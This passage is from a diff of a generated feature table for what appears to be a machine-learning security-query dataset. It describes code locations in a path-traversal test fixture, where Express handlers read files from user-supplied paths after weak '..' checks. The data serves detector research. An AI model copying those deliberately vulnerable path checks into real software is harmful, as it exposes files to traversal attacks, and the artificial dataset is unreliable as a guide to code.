readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:150:13:150:22 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:150:13:150:22 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:150:24:150:27 | '..' | CalleeFlexibleAccessPath | path.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:150:24:150:27 | '..' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:150:24:150:27 | '..' | calleeImports | | @@ -8366,6 +73482,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:150:24:150:27 | '..' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:150:24:150:27 | '..' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:150:24:150:27 | '..' | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:6 | fs | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:19 | fs.readFileSync | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:25 | fs.read ... c(path) | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:151:5:151:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:151:8:151:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:151:8:151:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:151:8:151:19 | readFileSync | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:151:8:151:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:151:8:151:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:151:21:151:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:151:21:151:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:151:21:151:24 | path | calleeImports | fs | @@ -8375,6 +73516,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:151:21:151:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:151:21:151:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:151:21:151:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:6 | fs | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:19 | fs.readFileSync | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:25 | fs.read ... c(path) | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:153:5:153:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:153:8:153:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:153:8:153:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:153:8:153:19 | readFileSync | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:153:8:153:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:153:8:153:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:153:21:153:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:153:21:153:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:153:21:153:24 | path | calleeImports | fs | @@ -8384,6 +73550,36 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:153:21:153:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:153:21:153:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:153:21:153:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:155:7:155:26 | !path.includes('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:155:7:155:26 | !path.includes('..') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:155:7:155:26 | !path.includes('..') | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:155:7:155:26 | !path.includes('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:155:7:155:26 | !path.includes('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:11 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:11 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:11 | path | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:11 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:11 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:20 | path.includes | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:20 | path.includes | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:20 | path.includes | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:20 | path.includes | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:20 | path.includes | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:26 | exceptional return of path.includes('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:26 | exceptional return of path.includes('..') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:26 | exceptional return of path.includes('..') | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:26 | exceptional return of path.includes('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:26 | exceptional return of path.includes('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:26 | path.includes('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:26 | path.includes('..') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:26 | path.includes('..') | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:26 | path.includes('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:155:8:155:26 | path.includes('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:155:13:155:20 | includes | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:155:13:155:20 | includes | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:155:13:155:20 | includes | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:155:13:155:20 | includes | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:155:13:155:20 | includes | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:155:22:155:25 | '..' | CalleeFlexibleAccessPath | path.includes | | autogenerated/TaintedPath/normalizedPaths.js:155:22:155:25 | '..' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:155:22:155:25 | '..' | calleeImports | | @@ -8393,6 +73589,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:155:22:155:25 | '..' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:155:22:155:25 | '..' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:155:22:155:25 | '..' | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:6 | fs | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:19 | fs.readFileSync | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:25 | fs.read ... c(path) | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:156:5:156:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:156:8:156:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:156:8:156:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:156:8:156:19 | readFileSync | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:156:8:156:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:156:8:156:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:156:21:156:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:156:21:156:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:156:21:156:24 | path | calleeImports | fs | @@ -8402,6 +73623,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:156:21:156:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:156:21:156:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:156:21:156:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:159:1:159:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:159:1:159:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:159:1:159:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:159:1:159:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:159:1:159:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:159:1:159:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:159:1:171:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:159:1:171:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:159:1:171:2 | app.get ... T OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:159:1:171:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:159:1:171:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:159:1:171:2 | exceptional return of app.get ... T OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:159:5:159:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:159:5:159:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:159:5:159:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:159:9:159:19 | '/noDotDot' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:159:9:159:19 | '/noDotDot' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:159:9:159:19 | '/noDotDot' | calleeImports | express | @@ -8409,6 +73645,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:159:9:159:19 | '/noDotDot' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:159:9:159:19 | '/noDotDot' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:159:9:159:19 | '/noDotDot' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:159:21 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:159:21 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:159:21 | fs | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:159:21 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:159:21 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:159:21 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:159:21 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:159:21 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:159:21 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:159:21 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | (req, r ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | (req, r ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | (req, r ... OT OK\\n} | calleeImports | express | @@ -8416,11 +73667,81 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | (req, r ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | (req, r ... OT OK\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | (req, r ... OT OK\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | return of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:159:22:171:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:159:23:159:25 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:159:23:159:25 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:159:23:159:25 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:159:23:159:25 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:159:23:159:25 | req | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:159:23:159:25 | req | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:159:23:159:25 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:159:23:159:25 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:159:23:159:25 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:159:23:159:25 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:159:28:159:30 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:159:28:159:30 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:159:28:159:30 | res | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:159:28:159:30 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:159:28:159:30 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:160:7:160:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:160:7:160:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:160:7:160:10 | path | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:160:7:160:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:160:7:160:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:160:7:160:49 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:160:7:160:49 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:160:7:160:49 